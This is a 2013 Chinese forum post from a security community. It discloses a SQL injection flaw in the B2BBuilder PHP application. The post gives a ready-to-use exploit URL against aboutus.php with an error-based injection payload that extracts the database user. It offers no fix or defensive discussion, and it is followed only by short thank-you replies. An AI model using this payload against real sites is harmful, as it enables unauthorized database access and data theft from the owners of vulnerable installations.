[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 xiaoxiaoabc 4051

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.

直接上利用方式,大家一看就懂.

http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论17次

要评论？请先登录或注册

17楼

krystalvip
2016-7-8 18:36

收藏了，感谢楼主

回复|@ta|踩(0)|顶(0)
16楼

xia1234
2013-9-28 16:08

这个可以有。

回复|@ta|踩(0)|顶(0)
15楼

dullub
2013-9-27 23:06

为啥这套程序都下载下来啊

回复|@ta|踩(0)|顶(0)
14楼

—7℃
2013-9-10 18:45

看完了，就得回复下

回复|@ta|踩(0)|顶(0)
13楼

ji4nr3n
2013-9-10 18:26

感谢作者的无私奉献

回复|@ta|踩(0)|顶(0)
12楼

cc4ss
2013-9-10 17:12

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
11楼

kk_skipper
2013-9-7 09:08

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
10楼

yantou
2013-9-6 21:09

收了谢谢啊

回复|@ta|踩(0)|顶(0)
9楼

xiaoxiaoabc
2013-9-5 21:07

mlgb

回复|@ta|踩(0)|顶(0)
8楼

lmy
2013-9-5 19:34

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
7楼

cnxxxxcn
2013-9-5 15:21

这个可以呵呵~~~

回复|@ta|踩(0)|顶(0)
6楼

Yaseng
2013-9-5 15:05

支持下lz

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2013-9-5 10:29

呵呵，支持一下、、、、

回复|@ta|踩(0)|顶(0)
4楼

uuwhat
2013-9-5 09:01

感谢

回复|@ta|踩(0)|顶(0)
3楼

twygame
2013-9-5 08:56

牛BB的人啊。。求带。

回复|@ta|踩(0)|顶(0)
2楼

hiicome
2013-9-5 06:36

收下了。都不错的

回复|@ta|踩(0)|顶(0)
1楼

52pride
2013-9-5 02:02

沙发

回复|@ta|踩(0)|顶(0)

代码学习用aspx打包tar.gz

有时候环境中无法执行命令，但又需要打包文件，可以用这个脚本as ...

2025-08-27 15:51:19 11 642

安全资讯专访黑客追风人查鲁特：跨域寻道，视角为刃【T00ls人物专访第十四期】

大家好，我叫查鲁特（ID：X-ROOT），查鲁特由ID音译而成，不是我 ...

2025-09-05 15:11:06 8 594

安全资讯基于 Linux 的联想网络摄像头漏洞可被远程利用，引发 BadUSB 攻击

网络安全研究人员披露了联想部分型号网络摄像头的漏洞，这些漏洞 ...

2025-08-10 10:39:35 7 978

安全资讯从“AI生成色情小说”案看网络传播淫秽物品案件辩护工作开展【T00ls法律讲堂第五十四期】

近日，从网络公开信息获悉，湖北省大冶市人民检察院将国内首例“ ...

2025-08-11 14:26:04 14 1003

安全资讯WordPress插件曝严重漏洞，攻击者可无认证注册管理员账户

WordPress是一款开源的、基于PHP和MySQL的内容管理系统（CMS）。 ...

2025-06-27 23:42:39 12 2711

精华推荐

渗透测试从PDO下的注入思路到Git 3000star项目0day

本文首发时间为2021年5月，刚注册坛内账号，同步分享一下，半年 ...

2022-04-18 12:12:25 43 3282

社会工程一次社会工程学攻击案例

前言：相信大家对社会工程学并不陌生，我接触网络安全的时间并不 ...

2011-11-21 17:25:00 186 29680

Web安全关于jackson漏洞一些利用

# jackson代码审计# Jackson反序列化基础知识## 前言开始Jackson ...

2024-09-24 09:22:40 15 754

渗透测试【庆新春】--->>验证码绕过及识别专题

又是一年来到，身在t00ls我感到很高兴。两年前搞采集时候学的东 ...

2017-01-08 09:02:57 83 2789

渗透测试初级域渗透系列 - 01. 基本介绍&信息获取

写在前面的话：这是一份初级的域渗透教程，旨在给不熟悉域 ...

2015-07-05 22:16:51 90 3772

Top ↑

[我爱t00ls] B2BBuilder 注入漏洞

关于作者

评论17次

收藏了，感谢楼主

这个可以有。

为啥这套程序都下载下来啊

看完了，就得回复下

感谢作者的无私奉献

支持原创，谢谢分享。

支持原创，谢谢分享。

收了谢谢啊

mlgb

支持原创，谢谢分享。

这个可以 呵呵~~~

支持下lz

呵呵，支持一下、、、、

感谢

牛BB的人啊。。求带。

收下了。都不错的

沙发

热门文章

代码学习用aspx打包tar.gz

安全资讯专访黑客追风人查鲁特：跨域寻道，视角为刃【T00ls人物专访第十四期】

安全资讯基于 Linux 的联想网络摄像头漏洞可被远程利用，引发 BadUSB 攻击

安全资讯从“AI生成色情小说”案看网络传播淫秽物品案件辩护工作开展【T00ls法律讲堂第五十四期】

安全资讯WordPress插件曝严重漏洞，攻击者可无认证注册管理员账户

最新回复

精华推荐

渗透测试从PDO下的注入思路到Git 3000star项目0day

社会工程一次社会工程学攻击案例

Web安全关于jackson漏洞一些利用

渗透测试【庆新春】--->>验证码绕过及识别专题

渗透测试初级域渗透系列 - 01. 基本介绍&信息获取

这个可以呵呵~~~